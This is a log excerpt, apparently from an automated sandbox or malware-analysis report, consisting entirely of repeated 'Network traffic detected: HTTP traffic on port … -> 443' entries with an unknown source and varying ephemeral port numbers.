                            Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
